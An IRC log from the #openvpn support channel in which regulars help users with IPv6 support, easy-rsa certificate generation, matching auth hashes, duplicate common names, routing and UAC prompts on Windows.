[Ping timeout: 245 seconds] 10:53 < dlucio> is ip6 support on 2.3 better 
than 2.2.2? 10:53 < jzaw> yes sorry i injected a little irony since debian wheezy is on 2.0something imsmr but certainly not on 2.3 10:53 < pekster> No, not NAT6 at the ISP, but if the customer site gets no PD or too small of one, the site may feel compelled to NAT internally. That would be Bad™ 10:53 <@ecrist> yes, dlucio 10:54 <@ecrist> 2.2.2 essentially has no ipv6 support, 2.3.0 has nearly full ipv6 support 10:54 < dlucio> ok, tahts enough for me to push 2.3 into mga3 10:55 < dlucio> thank you :) 10:55 < pekster> /64 only, IIRC. 2.3.1 should should smaller sizes too, if you need/want that 10:55 < pekster> That in theory "should" be less of an issue, minus aforementioned bad ISPs ;) 10:55 < jzaw> what is the time scale for full ipv6 ecrist ie listen to 1194 on :: ? 10:55 <@ecrist> jzaw: 2.3.1 or so 10:56 <@ecrist> pekster: 2.3.0 supports variable subnets iirc 10:56 * jzaw rubs his hands with glee :) 10:56 <@ecrist> 2.2.0 would only allow /64 10:56 <@ecrist> jzaw: you can run a fully-ipv6 server now, though 10:56 < jzaw> oh? 10:56 < pekster> jzaw: I told you how to do that last night 10:56 <@ecrist> heh 10:56 * jzaw shakes his head from the fog that must have set in 10:57 < pekster> udp6 0 0 :::5001 :::* 10:57 <@ecrist> s/fog/drunk/ 10:57 < pekster> Just add --proto udp6 10:57 < jzaw> same thing ecrist eheh 10:57 < jzaw> pekster, i missed that ... sorry must have scrolled up on the screen 10:57 < pekster> Leave the 'local' option omitted and it'll listen on :::1194 (or in my example, 5001) 10:57 < jzaw> really ? ... must try now 10:57 < pekster> No, you replied to it. 10:58 < jzaw> oh ... forgive ... three sheets to the wind then ! 10:58 < Rienzilha> hmm, since there's activity here... What would be the easiest way to distribute a specific openvpn configuration with a software package (on windows). Have the installer put configuration and certificate in the openvpn configuration file directory and create a new tap device? 10:58 < jzaw> i replied? 
this is bad cos i can't remember 10:58 < pekster> Pretty sure. Unless your reply was in regard to something else 10:59 <@ecrist> Rienzilha: yes 10:59 <@EugeneKay> More booze 10:59 <@EugeneKay> Always more booze 10:59 < Rienzilha> and is there an easy way to check if openvpn is installed and up to date? 10:59 < pekster> openvpn --version perhaps? 10:59 < pekster> Or your package manager, or the repo links 10:59 < jzaw> pekster, i probably did reply but sometimes i have gaps 11:00 < Rienzilha> pekster: scripted, on a few hundred end user windows machines :) 11:00 < Poster> probably a login script would do it 11:00 < Poster> but that's less of an openvpn question and more of a windows administration question 11:01 < pekster> I've leveraged NSIS and Group Policy personally, but there are many ways to do that 11:01 < pekster> Yup 11:01 < Rienzilha> well the user machines are not part of any centralized something 11:01 < pekster> I just wrapped the OpenVPN installer (which is itself NSIS) inside my own NSIS installer to get all the bundled "site stuff" shipped too (scripts, keys, config, etc) 11:01 < Rienzilha> ah 11:01 < Poster> still a windows deployment process though 11:01 < Rienzilha> yeah it is 11:02 < Rienzilha> I'll try to figure it out 11:12 -!- laner [~Lane@cpe-66-65-44-48.nyc.res.rr.com] has quit [Quit: Computer has gone to sleep.] 11:14 -!- star314 [~star314@xchg.fiss-oeaw.at] has joined #openvpn 11:18 -!- laner [~Lane@cpe-66-65-44-48.nyc.res.rr.com] has joined #openvpn 11:20 < dlucio> is openvpn 2.3 fully systemd aware? 11:20 -!- star314 [~star314@xchg.fiss-oeaw.at] has quit [Quit: Leaving] 11:21 * plaisthos does not even know what this means 11:22 <@plaisthos> probably not 11:22 <@EugeneKay> No. 
11:22 <@krzee> lol 11:22 <@EugeneKay> openvpn is a binary 11:22 <@krzee> I'm not systemd aware either 11:22 <@EugeneKay> Feel free to write a systemd-compatible init script 11:22 <@EugeneKay> It's a hipster initd 11:22 < dlucio> we have already, but i mean 11:22 < dlucio> i see that configure has --enable-systemd 11:23 <@plaisthos> it has? 11:24 <@plaisthos> oh yeah for querying password etc. via systemd 11:27 -!- hg_5 [~chatzilla@unaffiliated/hg-5/x-8664886] has joined #openvpn 11:28 -!- pyrobisqit [~pyrobisqi@87.red-88-5-221.dynamicip.rima-tde.net] has quit [Ping timeout: 272 seconds] 11:30 -!- speed_racer8 [~speed_rac@c-98-196-168-201.hsd1.tx.comcast.net] has quit [Ping timeout: 272 seconds] 11:43 -!- speed_racer8 [~speed_rac@c-76-30-149-251.hsd1.tx.comcast.net] has joined #openvpn 11:53 -!- speed_racer8 [~speed_rac@c-76-30-149-251.hsd1.tx.comcast.net] has quit [Ping timeout: 260 seconds] 11:54 < dlucio> it seems that the easy-rsa scripts from 2.2.2 have disappeared 11:54 < dlucio> or are they renamed and in another path 11:55 < pekster> It's a separate project now 11:55 <@krzee> it's a separate package now 11:55 < pekster> !easyrsa 11:55 < pekster> Hmm 11:55 <@krzee> !easy-rsa 11:55 <@vpnHelper> "easy-rsa" is (#1) easy-rsa is a certificate generation utility. or (#2) Download here: https://github.com/OpenVPN/easy-rsa/downloads or (#3) Download easy-rsa from git hub at https://github.com/OpenVPN/easy-rsa 11:55 < pekster> !learn easyrsa as [easy-rsa] 11:55 <@vpnHelper> Joo got it. 11:55 <@krzee> =] 11:55 < dlucio> haha ok, 11:56 <@krzee> ahh, you speak Spanish 11:56 < dlucio> YES 11:56 < dlucio> P 11:56 <@krzee> :p 11:58 -!- pyrobisqit [~pyrobisqi@87.Red-88-5-221.dynamicIP.rima-tde.net] has joined #openvpn 11:58 < dlucio> is the openvpn for android available at the play store? 
11:58 < dlucio> there has been an openvpn 2.1 package for a while there 11:59 <@krzee> !android 11:59 <@vpnHelper> "android" is (#1) an open source OpenVPN client for ICS is available in Google Play, look for OpenVPN for Android. FAQ is here: http://code.google.com/p/ics-openvpn/wiki/FAQ or (#2) If running cyanogenmod, openvpn and busybox are already installed for you! or (#3) If you do not have cyanogenmod or ICS, but your device is rooted, you can use android-openvpn-installer and openvpn-settings from the 11:59 <@vpnHelper> market 12:00 -!- speed_racer8 [~speed_rac@c-76-30-149-251.hsd1.tx.comcast.net] has joined #openvpn 12:03 < dlucio> the one from ARNE SCHWABE or from FRIEDRICH SCHÄUFFELHUT ?? 12:03 <@ecrist> look for openvpn connect 12:04 < dlucio> ha good 12:04 < dlucio> i found it 12:04 < dlucio> so, no rooted device :) 12:05 < dlucio> i have my phone rooted, but table , it is not 12:05 < dlucio> tablet 12:06 <@ecrist> ICS+ you don't need root 12:08 <@plaisthos> dlucio: mine! d: 12:11 < dlucio> i will give it a try, i don't have any complaint using the one that requires root anyway but if it is integrated as a service it is better 12:21 <@krzee> ecrist, you like openvpn connect more than openvpn for android? 12:21 <@ecrist> i've only used openvpn connect 12:21 <@krzee> i like the open source one better 12:21 <@ecrist> the other requires root, iirc, and I don't have a rooted device 12:21 <@krzee> no it doesn't 12:21 <@krzee> there's 2 no-root openvpn's for android 12:21 <@krzee> 1 is opensource, 1 is not 12:21 <@krzee> openvpn for android = open source and no root 12:21 <@krzee> openvpn connect = closed source and no root 12:22 <@ecrist> krzee: openvpn connect will be open-sourced soon 12:22 <@krzee> android-openvpn-installer and openvpn-settings is when you have no ics so need root 12:22 <@krzee> plaisthos made openvpn for android 12:22 <@ecrist> I know... 
12:22 <@krzee> aka arne schwabe 12:23 <@krzee> the friedrich one (fries) is the one that needs root 12:23 <@krzee> and openvpn connect is from openvpn technologies (when are they releasing that source?) 12:23 <@krzee> i didn't think they could because of the IOS app 12:24 <@ecrist> they can't release the iOS code itself 12:24 <@ecrist> the core openvpn code is to be released, though 12:24 <@krzee> right but they had to recode from scratch because of the IOS store rules 12:25 <@ecrist> no 12:25 <@krzee> thats what i understood at least' 12:25 <@ecrist> they recoded in C++ and changed a whole bunch of stuff, in large part, to save on battery life 12:26 <@ecrist> the re-code is basically just the client code, redone in c++ (like the openvpn-as client) 12:26 -!- Keshl [~Purple@24.115.178.18.res-cmts.gld.ptd.net] has joined #openvpn 12:27 <@krzee> right i understand that part, but could have sworn i was told in a meeting that it was recoded for IOS store rules and thats why the source was closed even on android 12:27 <@krzee> that the apple store is incompat with opensource 12:27 <@krzee> (licensing that is) 12:28 <@ecrist> that's why the iOS client won't be open sourced 12:28 -!- Sidewinder [~de@unaffiliated/sidewinder] has quit [Quit: Leaving] 12:31 -!- Cpt-Oblivious [Cpt-Oblivi@a202101.upc-a.chello.nl] has joined #openvpn 12:34 <@krzee> i still like openvpn for android :D 12:34 <@ecrist> heh 12:34 <@ecrist> I have nothing against it, just never tried it 12:34 <@krzee> it existed a bit before openvpn connect 12:34 <@krzee> so i got used to it early 12:35 <@krzee> i love it, it's everything i would have wanted 12:37 < pekster> I haven't (yet) gotten into android development, but I suppose I'll get there soon enough; I already have the SDK on 2 of my computers for the purposes of rooting and assorted adb tasks 12:43 -!- vraa__ [~speed_rac@c-76-30-149-251.hsd1.tx.comcast.net] has joined #openvpn 12:45 -!- speed_racer8 [~speed_rac@c-76-30-149-251.hsd1.tx.comcast.net] has 
quit [Ping timeout: 260 seconds] 12:47 -!- Keshl [~Purple@24.115.178.18.res-cmts.gld.ptd.net] has quit [Read error: Connection reset by peer] 12:47 -!- Keshl [~Purple@24.115.178.18.res-cmts.gld.ptd.net] has joined #openvpn 12:50 < Keshl> Does anyone have a few minutes to point me in the right direction? I've got a log of a connection that's being reset as soon as I connect. It seems to actually succeed and get an IP, but as soon as it does the server just resets the connection. I'm not sure what might be wrong in my configuration, but here's the log: http://pastebin.com/7xGy7Bwi 12:53 <@EugeneKay> Other end's log? 12:53 < Keshl> Good question. ... How do I get that, exactly? I've got it running on dd-wrt. Dunno where that actually /goes/... 12:54 -!- Keshl [~Purple@24.115.178.18.res-cmts.gld.ptd.net] has quit [Read error: Connection reset by peer] 12:54 -!- Keshl [~Purple@24.115.178.18.res-cmts.gld.ptd.net] has joined #openvpn 12:55 < Keshl> Sorry. Hiccuped. <.< 12:56 <@EugeneKay> Bugger if I know, I don't use ddwrt :-p 12:56 < Keshl> Okay, where is it usually on most Linux systems, then? Might get lucky. 12:57 <@EugeneKay> syslog 12:57 <@EugeneKay> Or wherever --log is 12:57 < Keshl> oh, there it is. 12:57 < Keshl> Yeah got it, one moment. 12:58 < Keshl> http://pastebin.com/A59nqxHA 12:58 <@EugeneKay> The most obvious problem is v2.3.0 vs v2.1.3 12:58 <@EugeneKay> It /oughta/ work, but no guarantees. 12:58 < Keshl> Ohhh.. 12:58 < Keshl> Well, might as well give 2.1.3 a whirl. 13:00 <@EugeneKay> !configs 13:00 <@vpnHelper> "configs" is (#1) please pastebin your client and server configs (with comments removed, you can use `grep -vE '^#|^;|^$' server.conf`), also include which OS and version of openvpn. or (#2) dont forget to include any ccd entries or (#3) on pfSense, see http://www.secure-computing.net/wiki/index.php/OpenVPN/pfSense to obtain your config 13:01 < pekster> HMAC auth failed? 
Did you forget a --tls-auth on one side, or not use the same shared key at both ends? 13:03 <@EugeneKay> that'd fail sooner 13:03 < pekster> Oh, never mind; it's partway through the handshake. Maybe incorrect --auth used though 13:04 < pekster> SHA512 isn't the default (SHA1 is) so both sides would explicitly need it defined 13:04 <@EugeneKay> Yeah, especially as the client says SHA1 13:04 <@EugeneKay> Er no, server 13:04 < Keshl> One thing at a time o_o I'm new to this. Trying 2.1.3 first. 13:05 < uberushaximus> That's what she said 13:05 < pekster> fwiw, I just use SHA256 since it's not really any less secure and saves some overhead, but that's just me 13:05 -!- uberushaximus was kicked from #openvpn by EugeneKay [innanuts] 13:05 < Keshl> uuuppz: Nice.. XD 13:05 -!- uberushaximus [~uberushax@hacked.thegov.us] has joined #openvpn 13:05 <@krzee> hah 13:05 < uberushaximus> <3 EugeneKay 13:05 < Keshl> 2.1.3, works happily! 13:05 * Keshl huggles! 13:05 < Keshl> Sort of. 13:05 <@EugeneKay> Well, there you go then? :v 13:05 <@krzee> no hmac error with 2.1.3? 13:06 < Keshl> It says it got an IP, but it still says "connecting" and the icon's yellow, not green. 13:06 <@EugeneKay> I think configs would help :-p 13:06 < Keshl> ...Indeed, looking at the log now it's doing the same thing as before <ω< 13:06 <@krzee> it's what pekster said 13:06 <@krzee> tls-auth mismatch on files or config options 13:07 < Keshl> Lemme check that first then. I'll bother'ya more if it still yells at me. 13:08 < Keshl> Blah. <.< Okay this is over my head. I think it's the fact dd-wrt's making me use a GUI rather than just being simple and typing the config like everyone else. 13:09 < Keshl> Where is the file normally stored on Linux? 
13:09 < pekster> /etc/openvpn/config-name.conf although you can really store it anywhere you like 13:09 < robert_> http://pastebin.com/jYGGvt9C -- I'm getting lots of "MULTI: bad source address from client [], packet dropped" between openwrt and a openvpn server my colleague and I are setting, up and I don't know why. :/ 13:09 < pekster> I just wrote my own bare-bones initscript for openwrt since I dislike the "config file integration" $upstream does 13:09 < Keshl> Least it gives me something to go off of. 13:09 <@EugeneKay> Blah, gUI 13:10 < robert_> an* openvpn ** 13:10 -!- krzee [nobody@openvpn/community/support/krzee] has left #openvpn ["Leaving"] 13:10 <@EugeneKay> robert_ - that usually means that there's a route one side has that the other isn't expecting 13:10 -!- Keshl [~Purple@24.115.178.18.res-cmts.gld.ptd.net] has quit [Read error: Connection reset by peer] 13:10 -!- krzee [nobody@hemp.ircpimps.org] has joined #openvpn 13:10 -!- krzee [nobody@hemp.ircpimps.org] has quit [Changing host] 13:10 -!- krzee [nobody@openvpn/community/support/krzee] has joined #openvpn 13:10 -!- mode/#openvpn [+o krzee] by ChanServ 13:10 <@EugeneKay> So openvpn drops the unknown traffic 13:10 < pekster> Keshl: This is not very refined (early dev version right out of my source control) but maybe you can tune this to work on dd-wrt if you'd like: http://pekster.sdf.org/code/files/openvpn.init.devel 13:10 -!- Keshl [~Purple@24.115.178.18.res-cmts.gld.ptd.net] has joined #openvpn 13:11 < robert_> EugeneKay: ah. and afternoon, btw. :D 13:11 < robert_> EugeneKay: would the server configuration help? 
13:12 <@EugeneKay> Meh, I don't feel like pawing through routes 13:12 <@EugeneKay> Even if I am wearing my OpenVPN shirt today 13:12 <@krzee> lol 13:12 <@krzee> wore mine 2 days ago :D 13:12 -!- kyrix [~ashley@85-126-76-82.work.xdsl-line.inode.at] has quit [Quit: Ex-Chat] 13:12 <@EugeneKay> It's covered in cat hair now :-/ 13:12 < uberushaximus> :\ 13:12 <@krzee> furballs 13:13 < uberushaximus> flippin cats 13:13 <@EugeneKay> It's a lady-friend's 13:13 <@krzee> hair or cat? 13:13 < uberushaximus> awwwww yeeeah 13:13 <@EugeneKay> Cat 13:14 <@EugeneKay> her hair too, but that's a lot less oppressing 13:14 < Keshl> pekster: Ain't finding it. Best I got is a screenshot of the GUI: http://ompldr.org/vaHR1bw/server.jpg . Client is http://pastebin.com/Sh4LqdT9 -- I tried changing the cipher to 128 on the server, which seems to make it hold longer but it still does the same thing. When I change it client-side, it appears right away with a "failed to connect" popup. 13:15 < Rienzilha> hmm, can one launch an openvpn session without being bothered by a uac prompt? 13:15 < Keshl> Rienzilha: Sure. Disable UAC. 13:15 < Keshl> (Otherwise, no) 13:15 <@EugeneKay> You can right click the icon and hit Disconnect 13:15 < Rienzilha> *sigh* 13:16 < pekster> Keshl: cipher isn't your problem. Your logs from earlier show one side using SHA1 and the other SHA512 as your hash choice. This is an error: they must match 13:16 <@EugeneKay> It'll reload the conf when you click Connect 13:16 <@EugeneKay> If you really want you can run it as a Windows service, but then you lose the icon 13:16 < Keshl> pekster: Oh. How do I change that, then? Client-side, preferably? There's apparently no easy way to do it server-side. 
13:16 < pekster> Rienzilha: That's the point of UAC: openvpn requires admin rights, and UAC confirms before you grant such a program rights to run as an admin (even if you "are" an admin user) 13:16 < pekster> Keshl: --auth in the manpage 13:17 < Rienzilha> pekster: I know why uac exists, but some applications are able to elevate automatically 13:17 < pekster> Use whatever hash you want, but they must match 13:17 <@EugeneKay> Though i know there is a hacky program to bypass UAC for certain apps 13:17 < Keshl> x.x Is there an online manual? I'm on Windows here. 13:17 < Rienzilha> but that probably needs expensive microsoft application signatures and what not 13:17 <@EugeneKay> Look up ElevatedShortcut 13:17 < pekster> Rienzilha: You mean prompt you automatically? No application should ever "become" an admin without prompting, unless it's a service and not an actual program 13:18 < Rienzilha> pekster: no I mean gain elevated privileges without prompting 13:18 < pekster> If you mean automatically prompt you so you don't have to "run as admin" that's been discussed 13:18 < pekster> Then turn UAC off? 13:18 < Rienzilha> what I need is the following 13:18 < pekster> Or use a solution like EugeneKay suggested (I'd guess it just elevates once and then runs child processes under its own admin rights) 13:18 < Rienzilha> I have an application that needs to establish an openvpn connection on launch (and ideally kill it on exit) 13:19 <@EugeneKay> It uses a special binary which is marked in Windows to not need UAC 13:19 <@EugeneKay> It's a filthy hack 13:20 < Rienzilha> users ideally shouldn't be bothered with uac prompts every time they launch, but if there is no way to accomplish that i'll bother them with uac prompts :) 13:20 < pekster> So, you want UAC to stop things from automatically running with system admin rights, but you don't want to prompt users? 
13:20 < pekster> Security or one-click operation: pick one :) 13:21 < Rienzilha> well there are quite some applications that can 13:21 < uberushaximus> what is NT security 13:21 <@EugeneKay> There's a setting to have UAC not prompt for Windows binaries 13:21 < Rienzilha> trusted applications can elevate without prompt 13:22 < Rienzilha> and the prompts don't work for most users anyway, since most people will click anything if needed :) 13:22 < robert_> anybody else? All I need is to fix this, and then I'll be out of everybody's hair. :p 13:23 < Keshl> pekster: I tried putting "auth SHA512" and "auth SHA1" in the client config. Checked the logs, the change did take. Same issue regardless. 13:23 < pekster> "Same issue"? It should be a "different issue" if you fixed your hash to match 13:23 < pekster> You don't need to try both settings: you need to match between your endpoints 13:24 < Keshl> It still does the same thing. Resets after it connects. Icon keeps changing from green to yellow and back over and over. 13:24 < pekster> That's not helpful 13:24 < pekster> I can tell you from that description that "it isn't working." 13:25 < Keshl> pekster: My bad. And thanks, there's another setting I didn't notice that ain't matching that I didn't catch. 13:25 < Keshl> ...Oh. Ohhh, that's, what's happening.. The GUI needs me to hit "save" then "apply". <.< Can't just hit "apply" 13:26 < Keshl> Heeeeey now it works! Thanks. -huggles at.- 13:26 < pulz> i got an openvpn client behind a nat router with an active portforward, when i start openvpn the portforward stops responding, any suggestions on how to handle this ? 
13:28 < pekster> pulz: I'm guessing you're using the --redirect-gateway option, or otherwise pushing a route that interferes with the reply traffic 13:29 < pekster> If so, your choices include 1) stop using gateway redirection, 2) exclude the source of traffic you wish to forward by a route to your pre-existing gateway, or 3) set up policy routing 13:29 < pulz> pekster: my guess was correct then i see, manual pushing of gateways ? 13:30 < pekster> Is that a question? 13:33 < pulz> no, thank you for the pointers, will look into it 13:34 -!- krzee [nobody@openvpn/community/support/krzee] has quit [Read error: Connection reset by peer] 13:38 -!- Keshl [~Purple@24.115.178.18.res-cmts.gld.ptd.net] has quit [Read error: Connection reset by peer] 13:38 -!- Keshl [~Purple@24.115.178.18.res-cmts.gld.ptd.net] has joined #openvpn 13:40 -!- Six6siX [~six6six@cpc2-ely06-2-0-cust377.5-1.cable.virginmedia.com] has joined #openvpn 13:40 < Six6siX> Hello people 13:41 < Six6siX> I have a problem with openvpn, i can connect to the server fine, i can surf the internet fine.. however if I log on using my iphone it knocks my laptop off the net. 13:41 < Six6siX> how would I get openvpn to assign multiple IPs to each device? 13:42 < pekster> !duplicate 13:42 <@vpnHelper> "duplicate" is the option duplicate-cn is for allowing the same cert to login more than once. It should not be used in most situations, with main exceptions being if you also use !authpass or if just testing 13:42 < Six6siX> oh 13:42 < rob0> best answer: make another certificate for the other client 13:42 < pekster> The correct way to do what you want is issue different certs to each device 13:42 < Six6siX> ah 13:43 < Six6siX> does this mean I have to run ./clean-all? 13:43 < pekster> No, that will wipe out your PKI 13:43 < Six6siX> oh 13:43 * Six6siX is a n00b 13:43 < pekster> Never run that unless you really want to start over with a new CA. 
You can generate a new keypair and sign it with the build-req script 13:44 < Six6siX> okay so which order do i do this? ./build-server-key then ./build-key followed by build-dh? 13:44 < pekster> Do you already have a server key and dh params? 13:44 < Six6siX> yea 13:45 < rob0> ./build-server-key ? Why 13:45 < pekster> Those are one-time operations, and you don't need to do them again 13:45 < Six6siX> oh okay 13:45 < pekster> Unless you want to authorize a new server, or re-generate your DH params for some reason 13:45 < Six6siX> no server is all working fine.. all i need is another client cert for my laptop 13:45 < pekster> Just create a new key (build-key, that's what I was looking for. My brain is too deep on the next version of easy-rsa I'm coding) 13:45 < Six6siX> ah okay 13:45 < Six6siX> awesome 13:46 < pekster> It's possible to generate your keypairs on the client device, send the req to the CA system for signing, and send the cert back, but that might be more than you want to deal with now. It's better security to do it that way, but you can add "best practices" later if you want to learn more after a working setup 13:46 < Six6siX> just got an error saying i need to source ./vars is this safe? 13:47 < pekster> Yes, you need to source vars each time you call easy-rsa from a new shell session 13:47 < Six6siX> okay cool 13:47 < pekster> Just ". ./vars" in your dir 13:47 < pekster> It just sets some env-vars 13:48 < rob0> envelope varsity 13:48 < Six6siX> awesome.. saved me from a load of hassle the fellas.. 13:48 < Six6siX> there* 13:49 < rob0> pekster, did you look at my lousy reimplementation of easy-rsa? I recently fixed it (it had been horribly broken.) 
13:50 < pekster> No, I ended up starting basically from scratch on some redesign 13:50 -!- WinstonSmith [~WinstonSm@unaffiliated/winstonsmith] has quit [Ping timeout: 245 seconds] 13:50 < pekster> I've got a new round of changes to make manually sourcing the config unnecessary, but you can check out what I've got now at: https://github.com/QueuingKoala/easy-rsa 13:50 <@vpnHelper> Title: QueuingKoala/easy-rsa · GitHub (at github.com) 13:50 < pekster> I've completely updated the OpenSSL config and operation too 13:50 < pekster> By default, no more silly "org/city/state/OU" cruft :) 13:51 < rob0> good 13:51 < pekster> And I'm making it easy to remove (and may make it the default, I'm not sure yet, to omit the "Netscape" extensions too) 13:51 < pekster> Suggestions welcome (here or -devel as you like) although I'm aware the sourcing business isn't exactly friendly. A solution is already in the works to fix that, and even run "configless" if desired 13:52 -!- WinstonSmith [~WinstonSm@unaffiliated/winstonsmith] has joined #openvpn 13:54 -!- pyrobisqit [~pyrobisqi@87.Red-88-5-221.dynamicIP.rima-tde.net] has quit [Read error: Connection reset by peer] 13:56 -!- vraa__ [~speed_rac@c-76-30-149-251.hsd1.tx.comcast.net] has quit [Ping timeout: 246 seconds] 13:59 -!- Six6siX [~six6six@cpc2-ely06-2-0-cust377.5-1.cable.virginmedia.com] has quit [Ping timeout: 260 seconds] 14:05 -!- robert___ [~hellspawn@static-96-254-212-18.tampfl.fios.verizon.net] has joined #openvpn 14:05 -!- robert___ [~hellspawn@static-96-254-212-18.tampfl.fios.verizon.net] has quit [Changing host] 14:05 -!- robert___ [~hellspawn@objectx/robert] has joined #openvpn 14:05 -!- mikkel [~mikkel@80-71-132-15.u.parknet.dk] has joined #openvpn 14:08 -!- robert_ [~hellspawn@objectx/robert] has quit [Ping timeout: 258 seconds] 14:08 -!- pyrobisqit [~yaaic@87.Red-88-5-221.dynamicIP.rima-tde.net] has joined #openvpn 14:08 -!- robert_ [~hellspawn@static-96-254-212-18.tampfl.fios.verizon.net] has joined #openvpn 14:08 
-!- robert_ [~hellspawn@static-96-254-212-18.tampfl.fios.verizon.net] has quit [Changing host] 14:08 -!- robert_ [~hellspawn@objectx/robert] has joined #openvpn 14:09 -!- pyrobisqit__ [~pyrobisqi@87.Red-88-5-221.dynamicIP.rima-tde.net] has joined #openvpn 14:09 -!- pyrobisqit__ [~pyrobisqi@87.Red-88-5-221.dynamicIP.rima-tde.net] has quit [Read error: Connection reset by peer] 14:09 -!- pyrobisqit_ [~pyrobisqi@87.Red-88-5-221.dynamicIP.rima-tde.net] has joined #openvpn 14:10 -!- pyrobisqit [~yaaic@87.Red-88-5-221.dynamicIP.rima-tde.net] has quit [Client Quit] 14:10 -!- robert___ [~hellspawn@objectx/robert] has quit [Ping timeout: 256 seconds] 14:10 -!- pyrobisqit_ [~pyrobisqi@87.Red-88-5-221.dynamicIP.rima-tde.net] has quit [Client Quit] 14:10 -!- pyrobisqit [~pyrobisqi@87.Red-88-5-221.dynamicIP.rima-tde.net] has joined #openvpn 14:11 -!- pyrobisqit [~pyrobisqi@87.Red-88-5-221.dynamicIP.rima-tde.net] has quit [Client Quit] 14:12 -!- pyrobisqit [~pyrobisqi@87.Red-88-5-221.dynamicIP.rima-tde.net] has joined #openvpn 14:13 -!- robert_ [~hellspawn@objectx/robert] has quit [Ping timeout: 255 seconds] 14:16 -!- hg_5 [~chatzilla@unaffiliated/hg-5/x-8664886] has quit [Read error: Connection reset by peer] 14:21 -!- emmanuelux [~emmanuelu@vau92-2-82-228-217-1.fbx.proxad.net] has joined #openvpn 14:25 -!- speed_racer8 [~speed_rac@c-76-30-149-251.hsd1.tx.comcast.net] has joined #openvpn 14:27 -!- raidz [~raidz@openvpn/corp/admin/andrew] has quit [Read error: Connection reset by peer] 14:28 -!- raidz [~raidz@openvpn/corp/admin/andrew] has joined #openvpn 14:28 -!- mode/#openvpn [+o raidz] by ChanServ 14:29 -!- laner [~Lane@cpe-66-65-44-48.nyc.res.rr.com] has quit [Quit: Computer has gone to sleep.] 14:35 -!- hrenovo [~hrenovo@li469-37.members.linode.com] has joined #openvpn 14:35 -!- Six6siX [~six6six@cpc2-ely06-2-0-cust377.5-1.cable.virginmedia.com] has joined #openvpn 14:36 -!- Cpt-Oblivious [Cpt-Oblivi@a202101.upc-a.chello.nl] has quit [] 14:36 < hrenovo> hi guys. 
I am stuck on something silly. I have 4 clients connected to the server, and I can ping the server from each client, but I cannot ping any client. I tried this test with firewal completely turned off on the client but no luck. 14:36 < hrenovo> also, I have client-to-client directive in server.conf 14:36 < hrenovo> ideas ? Thanks in advance. 14:37 -!- Six6siX_ [~six6six@cpc2-ely06-2-0-cust377.5-1.cable.virginmedia.com] has joined #openvpn 14:37 < pekster> Can't ping from the server to the client? 14:37 < Six6siX_> hey fellas, back again.. with another problem.. 14:37 < hrenovo> pekster: thats right 14:37 < pekster> If so, it is certainly a firewall issue. The reply ping goes back fine, so openvpn and routing are working normally 14:37 < hrenovo> pekster: can't ping client to client either 14:37 < pekster> Despite your assertation that it's not a firewall, it is 14:38 < hrenovo> pekster: I tried it with firewall turned off on the client 14:38 < Six6siX_> i built the keys earlier.. and im now unable to connect to the server.. It just disconnects without any errors... however my suspicions are when i built my keys it gave me an error "unable to update databse TXT_DB error number 2" 14:39 < pekster> Six6siX_: Sounds like you didn't use a unique CN 14:39 < Six6siX_> o_O 14:39 < pekster> IIRC that's the error you get. The CN (Common Name) of the certificate must be unique 14:39 < Six6siX_> oh... 14:39 < pekster> It's used to uniquely identify each certificate. They may not match, and the error you got is openssl refusing to add it 14:40 < Six6siX_> I named the key laptop.. and there wasnt any keys named laptop at the time 14:41 -!- Six6siX [~six6six@cpc2-ely06-2-0-cust377.5-1.cable.virginmedia.com] has quit [Ping timeout: 258 seconds] 14:41 < pekster> hrenovo: Again, if the ping from clien tto server works, there is by definition a reply packet (the echo-reply) that is getting sent back. openvpn is doing exactly what it's supposed to. 
tcpdump traffic starting on your server for the ping, and check your firewalls again 14:42 -!- benkay [~benkay@67.50.19.230] has joined #openvpn 14:43 < benkay> what do I need to know about setting up a CA with pkitool vs build-ca? 14:43 < benkay> !welcome 14:43 <@vpnHelper> "welcome" is (#1) Start by stating your goal, such as 'I would like to access the internet over my vpn' || new to IRC? see the link in !ask || we may need !logs and !configs and maybe !interface to help you. || See !howto for beginners. || See !route for lans behind openvpn. || !redirect for sending inet traffic through the server. || Also interesting: !man !/30 !topology !iporder !sample !forum 14:43 <@vpnHelper> !wiki !mitm or (#2) Don't use 192.168.1.0/24 or 192.168.0.0/24 (too much potential for conflict) 14:43 < hrenovo> pekster: firewall on the client? 14:43 < benkay> !goal understand differences between pkitool and build-ca 14:45 < pekster> Firewall at either end 14:45 < pekster> Hence tracing the packet 14:46 < pekster> Follow the flow of data, starting at the end sending it 14:46 < pekster> It would be possible (although odd) to have configured a server to drop outbound requests to a client, for instance 14:47 < rob0> except --client-to-client bypasses the OS firewall 14:47 < pekster> He's having issues getting from the server to the client 14:47 < pekster> Still think that'll hit filter/OUTPUT 14:47 < pekster> Among the usual mangle/nat tables 14:47 < rob0> server to client could, yes 14:47 < pekster> (on Linux, anyway) 14:47 < rob0> client to client can't be a server firewall with --client-to-client 14:48 < pekster> benkay: build-ca and the other scripts are just frontends. pkitool in Easy-RSA 2.x does all the real work 14:48 < benkay> thanks pekster! 
14:48 -!- Six6siX [~six6six@jasmine1.sammybakar.com] has joined #openvpn 14:48 < Six6siX> thank you pekster 14:49 < Six6siX> i've rebuilt the key with a unique name 14:49 < Six6siX> and it works 14:49 < pekster> Great 14:51 -!- Six6siX_ [~six6six@cpc2-ely06-2-0-cust377.5-1.cable.virginmedia.com] has quit [Ping timeout: 258 seconds] 14:53 -!- laner [~Lane@cpe-66-65-44-48.nyc.res.rr.com] has joined #openvpn 14:53 < benkay> when I run ./clean-all, I'm told to source ./vars first 14:53 < benkay> except that I already have 14:54 < benkay> confus! 14:55 < rob0> do you know what ./clean-all does? If you had a PKI, now you don't. 14:55 < benkay> yup! i do. 14:55 < benkay> my solution, if anyone cares at a later date, was to sudo -s and then source ./vars 14:56 < benkay> this is necessary because source is a bash command 14:56 < benkay> `sudo -s`, `source ./vars` 14:56 < rob0> um, there should be no need to sudo, just run the commands as the user who owns the PKI files. 14:58 < rob0> in fact, you probably do NOT want your CA/PKI to be owned by root. 14:58 < benkay> I can see how that would be a good idea. 14:58 < benkay> so, I'm setting up the PKI for the first time 14:58 < pekster> There's no reason Easy-RSA (or the openssl tool it calls to do the backend work) does not need to be run as root. You should not run things as root unless you need to (this is a Unix mentality) 14:59 < pekster> Erm, no reason it does need to be run as root 14:59 < rob0> yeah, no problem to blow it away a few times while playing around :) 15:00 < pekster> I create a role account to handle my PKI tasks, and all the files are mode 600 (or 700 for scripts.) No other user can view the files besides that account (and technically root, but root doesn't own or run any of my PKI scripts) 15:00 -!- Six6siX [~six6six@jasmine1.sammybakar.com] has quit [Ping timeout: 256 